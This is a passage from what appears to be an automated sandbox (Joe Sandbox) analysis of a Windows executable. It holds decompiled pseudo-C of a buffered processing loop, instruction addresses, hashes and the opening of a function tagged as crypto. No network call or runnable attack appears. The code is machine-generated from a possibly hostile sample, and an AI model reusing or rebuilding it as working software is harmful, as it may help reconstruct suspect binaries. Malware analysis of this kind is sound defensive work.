				void* _t565;
				intOrPtr _t584;
				void* _t586;
				signed int _t596;
				intOrPtr _t597;
				signed int _t603;
				signed int _t628;
				signed int _t629;
				intOrPtr _t631;
				signed int _t633;
				void* _t636;
				void* _t638;
				void* _t639;
				void* _t643;
				void* _t646;
				void* _t647;
				signed int _t649;
				signed int _t650;
				void* _t658;
				signed int* _t659;

				_t659 =  &_v160;
				_t445 =  *__ecx;
				_v148 = __ecx;
				_v116 = 0;
				_v112 = 0;
				_v60 = 0;
				_v48 = 0;
				_v104 = 0;
				_t368 = E00418A70( *((intOrPtr*)(__ecx + 0x1c)));
				if(_t368 != 0) {
					L155:
					return _t368;
				} else {
					while(1) {
						_t596 = 0;
						if( *(_t445 + 0x24) != 0) {
							break;
						}
						_t448 =  *((intOrPtr*)(_t445 + 0x34));
						_t370 =  *((intOrPtr*)(_t445 + 0x30));
						asm("adc ecx, edi");
						 *((intOrPtr*)(_t445 + 0x30)) = _t370 + 1;
						 *((intOrPtr*)(_t445 + 0x34)) = _t448;
						_v88 = _t370;
						_v84 = _t448;
						_t372 = E004188F0(_t445,  &_v140, 0, 0, 0, 0, _t370, _t448);
						_v156 = _t372;
						_v184 =  *(_t445 + 0x70);
						_v132 = 0;
						_v88 = 0;
						_v92 = 0;
						_v68 = 0;
						_v124 = 0;
						_v180 = 0;
						_v176 = 0;
						if(_t372 == 0 && _v140 == 0) {
							_v128 = 0;
							_v136 =  *(_v148 + 8);
							_t638 =  *(_t445 + 0x64) -  *(_t445 + 0x60);
							_v124 = _t638;
							L5:
							while(1) {
								if(_v136 != _t596) {
									L10:
									_t565 = _v136 + 0x10;
									_v120 = _t565;
									_t658 = _t565;
									if(_t638 == _t596) {
										_v144 =  *_t445;
										_v136 = E00418840( *((intOrPtr*)(_t445 + 0xc)), _t565,  &_v144);
										_t420 = _v148;
										_v160 = _v160 + _t420;
										asm("adc edx, ecx");
										__eflags = _v132 - _t596;
										if(_v132 == _t596) {
											_v100 = _t420;
										}
										 *((intOrPtr*)(_t445 + 0x68)) =  *((intOrPtr*)(_t445 + 0x68)) + _t420;
										asm("adc edx, ecx");
										__eflags = _t420 -  *_t445;
										_t495 = 0 | _t420 !=  *_t445;
										__eflags = _t495 - _t596;
										_v160 = _t495;
										if(_t495 != _t596) {
											 *(_t445 + 0x70) = 1;
										}
										_t496 = _v132;
										__eflags = _t496 - _t596;
										if(_t496 != _t596) {
											 *((intOrPtr*)(_t445 + 0x48)) = _t496;
											 *(_t445 + 0x70) = 1;
											_v160 = 1;
											_v132 = _t596;
										}
										_t498 = _v156 - _v116;
										__eflags = _t498;
										asm("sbb edx, edi");
										_v4 = _v152;
										if(_t498 != 0) {
											L20:
											_t596 = 0;
											_t422 = E004188F0(_t445,  &_v140, 0, 0, 0, 0, _v88, _v84);
											__eflags = _t422;
											_v156 = _t422;
											if(_t422 == 0) {
												__eflags = _v140;
												if(_v140 != 0) {
													goto L53;
												} else {
													_v112 = _v152;
													_t420 = _v144;
													_v116 = _v156;
													goto L24;
												}
											}
										} else {
											__eflags = _t498 - 1;
											if(_t498 < 1) {
												_t596 = 0;
												__eflags = 0;
												goto L24;
											} else {
												goto L20;
											}
										}
									} else {
										_t420 = _t638;
										_v156 = _t638;
										_v152 = _t596;
										_v100 = _t638;
										_v144 = _t420;
										_t658 =  *((intOrPtr*)(_t445 + 0x5c)) +  *(_t445 + 0x60) + 0x10;
										L24:
										_v40 = 0 | _v128 == _t596;
										_v28 = _v160;
										_v32 = _t420;
										_v36 = _t658;
										_v20 = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t445 + 0x18))))( &_v40);
										_t584 = _v28;
										_v68 = 1;
										_v108 = _v24;
										if(_t584 == 1) {
											__eflags = _t638 - _t596;
											_v164 = 1;
											_v48 = 1;
											if(_t638 != _t596) {
												_t507 = _v148;
												_t639 = _t658;
												_t508 = _t507 >> 2;
												memcpy(_v124, _t639, _t508 << 2);
												memcpy(_t639 + _t508 + _t508, _t639, _t507 & 0x00000003);
												_t659 =  &(_t659[6]);
												_t596 = 0;
												__eflags = 0;
											}
											 *(_t445 + 0x60) = _t596;
											 *(_t445 + 0x64) = _t596;
											goto L53;
										} else {
											_t432 = _v36;
											if(_t638 != _t596) {
												_t534 = _t432;
												_t647 = _t658;
												_t535 = _t534 >> 2;
												memcpy(_v124, _t647, _t535 << 2);
												_t584 = _v28;
												_t432 = memcpy(_t647 + _t535 + _t535, _t647, _t534 & 0x00000003);
												_t659 =  &(_t659[6]);
												_t638 = _v128;
												_t596 = 0;
												 *(_t445 + 0x60) = _t432 +  *(_t445 + 0x60);
											}
											if(_t584 != _t596) {
												__eflags = _t584 - 3;
												if(_t584 == 3) {
													_v164 = 1;
												}
												goto L38;
											} else {
												if(_v164 != _t596) {
													L38:
													_t513 = _v148;
													_v112 = 1;
													__eflags = _t432 - _t513;
													if(_t432 != _t513) {
														__eflags = _t584 - 3;
														if(_t584 != 3) {
															__eflags = _t638 - _t596;
															if(_t638 == _t596) {
																_t433 = E004179B0(_t445);
																__eflags = _t433 - _t596;
																if(_t433 != _t596) {
																	_t586 = _v36;
																	_t516 = _v148 - _t586;
																	 *(_t445 + 0x64) = _t516;
																	_v160 = _v160 - _t516;
																	asm("sbb edi, esi");
																	 *(_t445 + 0x60) = 0;
																	_t643 = _t586 + _t658;
																	_t517 = _t516 >> 2;
																	memcpy(_t643 + _t517 + _t517, _t643, memcpy(_t433, _t643, _t517 << 2) & 0x00000003);
																	_t659 =  &(_t659[6]);
																	_t432 = _v36;
																	_t596 = 0;
																	__eflags = 0;
																	goto L50;
																} else {
																	goto L48;
																}
															} else {
																_v160 = _t432;
																_v156 = _t596;
																L50:
																__eflags = _v132 - _t596;
																if(_v132 == _t596) {
																	_v104 = _t432;
																}
																_v164 = _t596;
															}
														} else {
															__eflags = _t638 - _t596;
															 *(_t445 + 0x60) = _t596;
															 *(_t445 + 0x64) = _t596;
															if(_t638 != _t596) {
																_t646 = _t432 + _t658;
																_t525 = _t513 - _t432 >> 2;
																memcpy(_t646 + _t525 + _t525, _t646, memcpy(_t432 + _v124, _t646, _t525 << 2) & 0x00000003);
																_t659 =  &(_t659[6]);
																_t513 = _v148;
																_t432 = _v36;
																_t596 = 0;
																__eflags = 0;
															}
															_t522 = _t513 - _t432;
															_v64 = _t432 + _t658;
															_v52 = _t522;
															asm("sbb edx, edi");
															__eflags = _v132 - _t596;
															_v160 = _v160 - _t522;
															if(_v132 == _t596) {
																_v104 = _t432;
															}
														}
													} else {
														 *(_t445 + 0x60) = _t596;
														 *(_t445 + 0x64) = _t596;
													}
													goto L53;
												} else {
													if(_t432 != _v148) {
														_v136 = 0xb;
													} else {
														_t441 = _v140;
														_v132 = _t441;
														_v140 =  *_t441;
														if(_t638 != _t596) {
															_t638 = 0;
															 *(_t445 + 0x60) = _t596;
															_v128 = 0;
															 *(_t445 + 0x64) = _t596;
														}
														continue;
													}
												}
											}
										}
									}
								} else {
									_t443 =  *((intOrPtr*)( *((intOrPtr*)(_t445 + 0x14))))();
									_v136 = _t443;
									if(_t443 == _t596) {
										L48:
										_v164 = 1;
										_v72 = 1;
										L53:
										__eflags = _v132 - _t596;
										if(_v132 == _t596) {
											_v140 = E00418890(_t445,  &_v140, _v88, _v84);
										}
									} else {
										_t532 = _v128;
										 *_t443 = _t596;
										if(_t532 == _t596) {
											 *(_v148 + 8) = _t443;
										} else {
											 *_t532 = _t443;
										}
										goto L10;
									}
								}
								goto L55;
							}
						}
						L55:
						_v136 = _t596;
						__eflags = _v132 - _t596;
						if(_v132 != _t596) {
							L61:
							_v160 = 1;
						} else {
							__eflags = _v108 - _t596;
							if(_v108 == _t596) {
								L60:
								__eflags = _v140 - _t596;
								if(_v140 != _t596) {
									goto L61;
								}
							} else {
								__eflags = _v140 - _t596;
								if(_v140 != _t596) {
									goto L61;
								} else {
									_t415 =  *((intOrPtr*)( *((intOrPtr*)(_t445 + 0x18)) + 4))();
									__eflags = _t415 - _t596;
									_v136 = _t415;
									if(_t415 != _t596) {
										_v108 = _t596;
										_v160 = 1;
									}
									goto L60;
								}
							}
						}
						_v144 = _t596;
						__eflags = _v160 - _t596;
						_v128 = _t596;
						if(_v160 != _t596) {
							L71:
							_t543 = 0;
							_t649 = 0;
							__eflags = _v132;
							_v116 = 0;
							_v112 = 0;
							_v56 = 0;
							_v52 = 0;
							_v96 = 0;
							_v92 = 0;
							_v80 = 0;
							_v76 = 0;
							if(_v132 == 0) {
								__eflags = _v108;
								if(_v108 != 0) {
									__eflags = _v136;
									if(_v136 == 0) {
										_t393 = 1;
										_v120 =  *(_v148 + 8);
										while(1) {
											__eflags = _t393;
											if(_t393 == 0) {
												goto L77;
											}
											L76:
											_t633 = _v100;
											L81:
											_t555 = _t543 + _t633;
											asm("adc ebp, 0x0");
											_t395 = 1;
											__eflags = _t555 - _v156;
											_v96 = _t555;
											_v92 = _t649;
											_v124 = 1;
											if(_t555 != _v156) {
												L83:
												_t395 = 0;
												__eflags = 0;
											} else {
												__eflags = _t649 - _v152;
												if(_t649 != _v152) {
													goto L83;
												}
											}
											_t398 =  *((intOrPtr*)( *((intOrPtr*)(_t445 + 0x18)) + 8))(_v120 + 0x10, _t633, _t395,  &_v96,  &_v80,  &_v124);
											__eflags = _t398;
											_v160 = _t398;
											if(_t398 != 0) {
												E004189E0(_t445, _v112, _v108);
											} else {
												__eflags = _v148;
												if(_v148 == 0) {
													_t543 = _v120;
													_t649 = _v116;
													__eflags = _t543 - _v180;
													if(_t543 != _v180) {
														L88:
														_t403 = _t649;
														_t478 = _t543 - _v140;
														asm("sbb eax, esi");
														_t636 = _v104 - _v80;
														_t603 = _v100;
														asm("sbb edi, [esp+0x7c]");
														__eflags = _t649;
														if(__eflags > 0) {
															L93:
															_t404 = E004188F0(_t445,  &_v164, _t478, _t403, _t636, _t603, _v112, _v108);
															__eflags = _t404;
															_v180 = _t404;
															if(_t404 == 0) {
																__eflags = _v164;
																if(_v164 == 0) {
																	_t543 = _v120;
																	_t649 = _v116;
																	_v140 = _t543;
																	_v136 = _t649;
																	_v80 = _v104;
																	_v76 = _v100;
																	goto L96;
																}
															}
														} else {
															if(__eflags < 0) {
																L91:
																__eflags = _t603;
																if(_t603 > 0) {
																	goto L93;
																} else {
																	__eflags = _t636 - 1;
																	if(_t636 < 1) {
																		L96:
																		_t393 = 0;
																		_v144 =  *_v144;
																		__eflags = _t393;
																		if(_t393 == 0) {
																			goto L77;
																		}
																		goto L81;
																	} else {
																		goto L93;
																	}
																}
															} else {
																__eflags = _t478 - 1;
																if(_t478 >= 1) {
																	goto L93;
																} else {
																	goto L91;
																}
															}
														}
													} else {
														__eflags = _t649 - _v176;
														if(_t649 != _v176) {
															goto L88;
														}
													}
												}
											}
											goto L98;
											L77:
											_t633 =  *_t445;
											_t471 = _v156 - _t543;
											asm("sbb eax, ebp");
											__eflags = 0 - _v152;
											if(__eflags >= 0) {
												if(__eflags > 0) {
													L80:
													_t633 = _t471;
												} else {
													__eflags = _t633 - _t471;
													if(_t633 > _t471) {
														goto L80;
													}
												}
											}
											goto L81;
										}
									}
								}
							}
							L98:
							_t368 = E00418A70( *((intOrPtr*)(_v148 + 0x20)));
							_t650 = 0;
							__eflags = _t368;
							if(_t368 != 0) {
								goto L155;
							} else {
								_t597 = _v64;
								__eflags =  *(_t445 + 0x24);
								_v104 = 0;
								_v124 = 1;
								if( *(_t445 + 0x24) != 0) {
									break;
								} else {
									__eflags =  *(_t445 + 0x50);
									if( *(_t445 + 0x50) == 0) {
										_t377 = _v136;
										__eflags = _t377;
										if(_t377 == 0) {
											L104:
											_t378 = _v68;
										} else {
											 *(_t445 + 0x4c) = _t377;
											__eflags = _t377 - 2;
											 *(_t445 + 0x50) = 1;
											_t378 = 1;
											if(_t377 != 2) {
												goto L104;
											}
										}
										_t544 = _v128;
										__eflags = _t544 - _t650;
										if(_t544 != _t650) {
											 *(_t445 + 0x50) = 1;
											 *((intOrPtr*)(_t445 + 0x40)) = _t544;
											_t597 = 0;
											__eflags = 0;
										}
										__eflags = _t378 - _t650;
										if(_t378 != _t650) {
											 *(_t445 + 0x50) = 1;
											 *(_t445 + 0x38) = 1;
											_t597 = 0;
											__eflags = 0;
										}
										__eflags = _v44 - _t650;
										if(_v44 != _t650) {
											 *(_t445 + 0x50) = 1;
											 *(_t445 + 0x3c) = 1;
											_t597 = 0;
											__eflags = 0;
										}
									} else {
										_v140 = 1;
									}
									__eflags = _v108 - _t650;
									if(_v108 == _t650) {
										_t628 = _v132;
									} else {
										__eflags = _v140 - _t650;
										if(_v140 == _t650) {
											_t389 = _v92;
											_t465 = _v96;
											_t554 = _v76;
											_t631 = _v80;
										} else {
											_t465 = 0;
											_t389 = 0;
											_t631 = 0;
											_t554 = 0;
											_v96 = 0;
											_v92 = 0;
											_v80 = 0;
											_v76 = 0;
										}
										asm("sbb eax, ebp");
										asm("sbb edx, ebp");
										_t628 = E004178D0(_t445 + 0x98, _t465 - _v116, _t389, _t631 - _v56, _t554);
										_t650 = 0;
									}
									_v160 - _t650 = _v64 - _t650;
									_v72 = 0 | _v160 == _t650;
									if(_v64 != _t650) {
										__eflags = _t628 - _t650;
										if(_t628 != _t650) {
											L122:
											_t384 = 0;
											__eflags = 0;
										} else {
											__eflags = _t597 - _t650;
											if(_t597 == _t650) {
												goto L122;
											} else {
												__eflags = _v140 - _t650;
												if(_v140 != _t650) {
													goto L122;
												} else {
													_t384 = 1;
												}
											}
										}
										_t628 =  *((intOrPtr*)( *((intOrPtr*)(_t445 + 0x18)) + 0xc))(_t384, _v60, _v48,  &_v72,  &_v124);
										__eflags = _t628 - _t650;
										if(_t628 == _t650) {
											__eflags = _v92 - _t650;
											if(_v92 == _t650) {
												__eflags = _v180 - _t650;
												if(_v180 == _t650) {
													goto L127;
												}
											}
										} else {
											_v124 = 1;
											 *(_t445 + 0x50) = 1;
											L127:
											E004189E0(_t445, _v108, _v104);
										}
									}
									__eflags = _v124 - _t650;
									if(_v124 == _t650) {
										L142:
										_t629 = _v148;
										goto L143;
									} else {
										__eflags = _v108 - _t650;
										if(_v108 == _t650) {
											L136:
											__eflags =  *((intOrPtr*)(_t445 + 0x84)) - _t650;
											if( *((intOrPtr*)(_t445 + 0x84)) != _t650) {
												goto L138;
											} else {
												_t629 = _v148;
												 *((intOrPtr*)(_t445 + 0x80)) =  *((intOrPtr*)(_t629 + 4));
											}
											goto L139;
										} else {
											__eflags = _t628 - _t650;
											if(_t628 != _t650) {
												goto L136;
											} else {
												__eflags =  *(_t445 + 0x50) - _t650;
												if( *(_t445 + 0x50) != _t650) {
													goto L136;
												} else {
													__eflags = _v136 - _t650;
													if(_v136 != _t650) {
														goto L136;
													} else {
														__eflags = _v140 - _t650;
														if(_v140 != _t650) {
															goto L136;
														} else {
															__eflags =  *((intOrPtr*)(_t445 + 0x84)) - _t650;
															if( *((intOrPtr*)(_t445 + 0x84)) != _t650) {
																L138:
																_t629 = _v148;
																L139:
																_t382 = _v156;
																_t459 = _v152;
																__eflags = _t382 | _t459;
																if((_t382 | _t459) != 0) {
																	L141:
																	 *(_t629 + 0x10) = _t382;
																	 *(_t629 + 0xc) = _v100;
																	 *(_t629 + 0x14) = _t459;
																	 *((intOrPtr*)(_t445 + 0x84)) =  *((intOrPtr*)(_t445 + 0x84)) + 1;
																	L143:
																	__eflags = _v160 - _t650;
																	if(_v160 != _t650) {
																		goto L146;
																	} else {
																		_t356 = _v144 + 0x20; // 0x20
																		_t368 = E00418AC0(_t356);
																		__eflags = _t368 - _t650;
																		if(_t368 != _t650) {
																			goto L155;
																		} else {
																			goto L152;
																		}
																	}
																} else {
																	__eflags = _v160 - _t650;
																	if(_v160 != _t650) {
																		L146:
																		__eflags = _v72 - _t650;
																		if(_v72 == _t650) {
																			__eflags =  *((intOrPtr*)(_t629 + 4)) - _t650;
																			if( *((intOrPtr*)(_t629 + 4)) == _t650) {
																				break;
																			} else {
																				 *(_t445 + 0x24) = 1;
																				goto L151;
																			}
																		} else {
																			_t368 = E00418AC0(_t445 + 0xe8);
																			__eflags = _t368 - _t650;
																			if(_t368 != _t650) {
																				goto L155;
																			} else {
																				L151:
																				_t368 = E00418AC0(_t445 + 0xe4);
																				__eflags = _t368 - _t650;
																				if(_t368 != _t650) {
																					goto L155;
																				} else {
																					L152:
																					_v116 = _t650;
																					_v112 = _t650;
																					_v60 = _t650;
																					_v48 = _t650;
																					_v104 = _t650;
																					_t380 = E00418A70( *((intOrPtr*)(_t629 + 0x1c)));
																					__eflags = _t380 - _t650;
																					if(_t380 == _t650) {
																						continue;
																					} else {
																						return _t380;
																					}
																				}
																			}
																		}
																	} else {
																		goto L141;
																	}
																}
															} else {
																__eflags = _v104 - _t650;
																if(_v104 == _t650) {
																	goto L142;
																} else {
																	goto L136;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						} else {
							_t408 =  *(_t445 + 0x58);
							__eflags = _t408 -  *(_t445 + 0x54);
							if(_t408 >=  *(_t445 + 0x54)) {
								L70:
								_t409 = _v148;
								_t484 =  *((intOrPtr*)(_t409 + 4)) + 1;
								__eflags = _t484 -  *(_t445 + 0x58);
								asm("sbb eax, eax");
								_t412 = _t445 + ((_t409 & _t484) + 5 + ((_t409 & _t484) + 5) * 4) * 8;
								_v144 = _t412;
								_t215 = _t412 + 0x1c; // 0x17
								_t368 = E00418AC0(_t215);
								__eflags = _t368 - _t596;
								if(_t368 != _t596) {
									goto L155;
								} else {
									goto L71;
								}
							} else {
								__eflags = _v104 - _t596;
								if(_v104 == _t596) {
									goto L70;
								} else {
									_t413 = E00418800(_t445 + (_t408 + 0x19 + _t408 * 4) * 8);
									__eflags = _t413 - _t596;
									if(_t413 != _t596) {
										_t488 =  *(_t445 + 0x58);
										__eflags = _t488 - 1;
										if(_t488 != 1) {
											 *(_t445 + 0x54) = _t488;
											goto L70;
										} else {
											_v160 = _t488;
											_v108 = _t596;
											_v128 = _t413;
											goto L71;
										}
									} else {
										 *(_t445 + 0x58) =  *(_t445 + 0x58) + 1;
										goto L70;
									}
								}
							}
						}
						goto L156;
					}
					_t368 = 0;
					__eflags = 0;
					goto L155;
				}
				L156:
			}

0x00417ec0
0x00417ec7
0x00417ecb
0x00417ed5
0x00417ed9
0x00417edd
0x00417ee1
0x00417ee8
0x00417eec
0x00417ef3
0x004187f5
0x004187ff
0x00417ef9
0x00417ef9
0x00417efc
0x00417f00
0x00000000
0x00000000
0x00417f06
0x00417f09
0x00417f16
0x00417f18
0x00417f1c
0x00417f27
0x00417f2b
0x00417f2f
0x00417f39
0x00417f3d
0x00417f41
0x00417f45
0x00417f49
0x00417f4d
0x00417f54
0x00417f58
0x00417f5c
0x00417f60
0x00417f77
0x00417f7e
0x00417f85
0x00417f87
0x00000000
0x00417f8b
0x00417f8f
0x00417fbc
0x00417fc0
0x00417fc5
0x00417fc9
0x00417fcb
0x00417ff8
0x00418007
0x0041800b
0x00418011
0x00418019
0x00418023
0x00418025
0x00418027
0x00418027
0x00418030
0x00418036
0x0041803f
0x00418046
0x00418049
0x0041804b
0x0041804f
0x00418051
0x00418051
0x00418054
0x00418058
0x0041805a
0x0041805c
0x0041805f
0x00418062
0x00418066
0x00418066
0x00418076
0x00418076
0x0041807c
0x0041807e
0x00418085
0x0041808c
0x00418095
0x004180a2
0x004180a7
0x004180a9
0x004180ad
0x004180b3
0x004180b7
0x00000000
0x004180bd
0x004180c5
0x004180c9
0x004180cd
0x00000000
0x004180cd
0x004180b7
0x00418087
0x00418087
0x0041808a
0x004180d3
0x004180d3
0x00000000
0x00000000
0x00000000
0x00000000
0x0041808a
0x00417fcd
0x00417fd3
0x00417fd5
0x00417fd9
0x00417fdd
0x00417fe1
0x00417fe5
0x004180d5
0x004180e4
0x004180eb
0x004180fd
0x0041810e
0x00418115
0x00418120
0x00418122
0x00418133
0x0041813b
0x0041813f
0x004181b7
0x004181b9
0x004181bd
0x004181c4
0x004181c6
0x004181d0
0x004181d2
0x004181d5
0x004181dc
0x004181dc
0x004181de
0x004181de
0x004181de
0x004181e0
0x004181e3
0x00000000
0x00418141
0x00418141
0x0041814a
0x00418150
0x00418154
0x00418156
0x00418159
0x0041815d
0x00418167
0x00418167
0x0041816c
0x00418172
0x00418174
0x00418174
0x00418179
0x004181f8
0x004181fb
0x004181fd
0x004181fd
0x00000000
0x0041817b
0x0041817f
0x00418205
0x00418205
0x00418209
0x00418211
0x00418213
0x00418220
0x00418223
0x0041828c
0x0041828e
0x0041829c
0x004182a1
0x004182a3
0x004182b8
0x004182c7
0x004182cb
0x004182ce
0x004182d7
0x004182d9
0x004182e4
0x004182e7
0x004182f1
0x004182f1
0x004182f3
0x004182fa
0x004182fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00418290
0x00418290
0x00418294
0x004182fc
0x004182fc
0x00418300
0x00418302
0x00418302
0x00418306
0x00418306
0x00418225
0x00418225
0x00418227
0x0041822a
0x0041822d
0x00418235
0x0041823d
0x00418247
0x00418247
0x00418249
0x0041824d
0x00418254
0x00418254
0x00418254
0x0041825d
0x0041825f
0x00418267
0x00418274
0x00418276
0x00418278
0x00418280
0x00418286
0x00418286
0x00418280
0x00418215
0x00418215
0x00418218
0x00418218
0x00000000
0x00418185
0x00418189
0x004181eb
0x0041818b
0x0041818b
0x00418191
0x00418197
0x0041819b
0x004181a1
0x004181a3
0x004181a6
0x004181aa
0x004181aa
0x00000000
0x0041819b
0x00418189
0x0041817f
0x00418179
0x0041813f
0x00417f91
0x00417f99
0x00417f9d
0x00417fa1
0x004182a5
0x004182aa
0x004182ae
0x0041830a
0x0041830a
0x0041830e
0x00418325
0x00418325
0x00417fa7
0x00417fa7
0x00417fab
0x00417faf
0x00417fb9
0x00417fb1
0x00417fb1
0x00417fb1
0x00000000
0x00417faf
0x00417fa1
0x00000000
0x00417f8f
0x00417f8b
0x00418329
0x0041832d
0x00418331
0x00418333
0x0041836b
0x0041836b
0x00418335
0x00418335
0x00418339
0x00418365
0x00418365
0x00418369
0x00000000
0x00000000
0x0041833b
0x0041833b
0x0041833f
0x00000000
0x00418341
0x0041834e
0x00418351
0x00418353
0x00418357
0x00418359
0x0041835d
0x0041835d
0x00000000
0x00418357
0x0041833f
0x00418339
0x00418377
0x0041837b
0x0041837d
0x00418381
0x004183ef
0x004183f3
0x004183f5
0x004183f7
0x004183f9
0x004183fd
0x00418401
0x00418405
0x00418409
0x0041840d
0x00418411
0x00418415
0x00418419
0x00418423
0x00418425
0x0041842f
0x00418431
0x0041843b
0x00418443
0x00418447
0x00418447
0x00418449
0x00000000
0x00000000
0x0041844b
0x0041844b
0x0041846d
0x00418471
0x00418473
0x00418476
0x0041847b
0x0041847d
0x00418481
0x00418485
0x00418489
0x00418491
0x00418491
0x00418491
0x0041848b
0x0041848b
0x0041848f
0x00000000
0x00000000
0x0041848f
0x004184b9
0x004184bc
0x004184be
0x004184c2
0x0041858a
0x004184c8
0x004184cc
0x004184ce
0x004184d4
0x004184dc
0x004184e0
0x004184e2
0x004184ee
0x004184f8
0x004184fa
0x00418500
0x00418506
0x00418508
0x0041850c
0x00418510
0x00418512
0x00418524
0x00418538
0x0041853d
0x0041853f
0x00418543
0x00418549
0x0041854b
0x0041854d
0x00418551
0x0041855d
0x00418561
0x00418565
0x00418569
0x00000000
0x00418569
0x0041854b
0x00418514
0x00418514
0x0041851b
0x0041851b
0x0041851d
0x00000000
0x0041851f
0x0041851f
0x00418522
0x0041856d
0x00418573
0x00418575
0x00418447
0x00418449
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00418522
0x00418516
0x00418516
0x00418519
0x00000000
0x00000000
0x00000000
0x00000000
0x00418519
0x00418514
0x004184e4
0x004184e4
0x004184e8
0x00000000
0x00000000
0x004184e8
0x004184e2
0x004184ce
0x00000000
0x00418451
0x00418459
0x0041845b
0x0041845d
0x00418461
0x00418463
0x00418465
0x0041846b
0x0041846b
0x00418467
0x00418467
0x00418469
0x00000000
0x00000000
0x00418469
0x00418465
0x00000000
0x00418463
0x00418447
0x00418431
0x00418425
0x0041858f
0x00418596
0x0041859b
0x0041859d
0x0041859f
0x00000000
0x004185a5
0x004185a8
0x004185b1
0x004185b3
0x004185b7
0x004185bb
0x00000000
0x004185c1
0x004185c1
0x004185c4
0x004185cc
0x004185d0
0x004185d2
0x004185e1
0x004185e1
0x004185d4
0x004185d4
0x004185d7
0x004185da
0x004185dd
0x004185df
0x00000000
0x00000000
0x004185df
0x004185e5
0x004185e9
0x004185eb
0x004185ed
0x004185f0
0x004185f3
0x004185f3
0x004185f3
0x004185f5
0x004185f7
0x004185f9
0x004185fc
0x004185ff
0x004185ff
0x004185ff
0x00418601
0x00418608
0x0041860a
0x0041860d
0x00418610
0x00418610
0x00418610
0x004185c6
0x004185c6
0x004185c6
0x00418612
0x00418616
0x00418675
0x00418618
0x00418618
0x0041861c
0x00418638
0x0041863c
0x00418640
0x00418644
0x0041861e
0x0041861e
0x00418620
0x00418622
0x00418624
0x00418626
0x0041862a
0x0041862e
0x00418632
0x00418632
0x00418652
0x0041865e
0x0041866f
0x00418671
0x00418671
0x00418688
0x0041868a
0x0041868e
0x00418690
0x00418692
0x004186a5
0x004186a5
0x004186a5
0x00418694
0x00418694
0x00418696
0x00000000
0x00418698
0x00418698
0x0041869c
0x00000000
0x0041869e
0x0041869e
0x0041869e
0x0041869c
0x00418696
0x004186cf
0x004186d1
0x004186d3
0x004186e3
0x004186e7
0x004186e9
0x004186ed
0x00000000
0x00000000
0x004186ed
0x004186d5
0x004186da
0x004186de
0x004186ef
0x004186fb
0x004186fb
0x004186d3
0x00418700
0x00418704
0x00418773
0x00418773
0x00000000
0x00418706
0x00418706
0x0041870a
0x0041872f
0x0041872f
0x00418735
0x00000000
0x00418737
0x00418737
0x0041873e
0x0041873e
0x00000000
0x0041870c
0x0041870c
0x0041870e
0x00000000
0x00418710
0x00418710
0x00418713
0x00000000
0x00418715
0x00418715
0x00418719
0x00000000
0x0041871b
0x0041871b
0x0041871f
0x00000000
0x00418721
0x00418721
0x00418727
0x00418746
0x00418746
0x0041874a
0x0041874a
0x0041874e
0x00418754
0x00418756
0x0041875e
0x00418762
0x00418765
0x00418768
0x0041876b
0x00418777
0x00418777
0x0041877b
0x00000000
0x0041877d
0x00418781
0x00418784
0x00418789
0x0041878b
0x00000000
0x0041878d
0x00000000
0x0041878d
0x0041878b
0x00418758
0x00418758
0x0041875c
0x0041878f
0x0041878f
0x00418793
0x004187a6
0x004187a9
0x00000000
0x004187ab
0x004187ab
0x00000000
0x004187ab
0x00418795
0x0041879b
0x004187a0
0x004187a2
0x00000000
0x004187a4
0x004187b2
0x004187b8
0x004187bd
0x004187bf
0x00000000
0x004187c1
0x004187c1
0x004187c4
0x004187c8
0x004187cc
0x004187d0
0x004187d7
0x004187db
0x004187e0
0x004187e2
0x00000000
0x004187e8
0x004187f2
0x004187f2
0x004187e2
0x004187bf
0x004187a2
0x00000000
0x00000000
0x00000000
0x0041875c
0x00418729
0x00418729
0x0041872d
0x00000000
0x00000000
0x00000000
0x00000000
0x0041872d
0x00418727
0x0041871f
0x00418719
0x00418713
0x0041870e
0x0041870a
0x00418704
0x004185bb
0x00418383
0x00418383
0x00418389
0x0041838b
0x004183c1
0x004183c1
0x004183cb
0x004183cc
0x004183ce
0x004183d8
0x004183db
0x004183df
0x004183e2
0x004183e7
0x004183e9
0x00000000
0x00000000
0x00000000
0x00000000
0x0041838d
0x0041838d
0x00418391
0x00000000
0x00418393
0x0041839a
0x0041839f
0x004183a1
0x004183a8
0x004183ab
0x004183ae
0x004183be
0x00000000
0x004183b0
0x004183b0
0x004183b4
0x004183b8
0x00000000
0x004183b8
0x004183a3
0x004183a3
0x00000000
0x004183a3
0x004183a1
0x00418391
0x0041838b
0x00000000
0x00418381
0x004187f3
0x004187f3
0x00000000
0x004187f3
0x00000000

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 4060455350-0
Opcode ID: d91d0f24886aa54881d1fee9411465e8b1a358461c2d41ae07dc7561fca3ab1c
Instruction ID: 0dc7357cac2cd79fa94644e9c2eba0aba47737fef7d268bb9f56e353bf7a9682
Opcode Fuzzy Hash: d91d0f24886aa54881d1fee9411465e8b1a358461c2d41ae07dc7561fca3ab1c
Instruction Fuzzy Hash: B962F471A083458FCB24DF19C4805ABFBE2BFC8744F244A6EE89987315DB75D885CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00416536, Relevance: .5, Instructions: 516
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00416536(unsigned int __eax, void* __ecx, signed int __edx, signed int __esi) {
				unsigned int _t495;
				unsigned int _t496;
				unsigned int _t497;
				unsigned int _t498;
				unsigned int _t499;
				unsigned int _t500;
				unsigned int _t501;
				unsigned int _t502;
				unsigned int _t508;
				unsigned int _t509;
				unsigned int _t510;
				unsigned int _t511;
				unsigned int _t512;
				unsigned int _t515;
				unsigned int _t516;
				unsigned int _t517;
				unsigned int _t518;
				unsigned int _t519;
				unsigned int _t520;
				unsigned int _t521;
				unsigned int _t522;
				unsigned int _t523;
				unsigned int _t524;
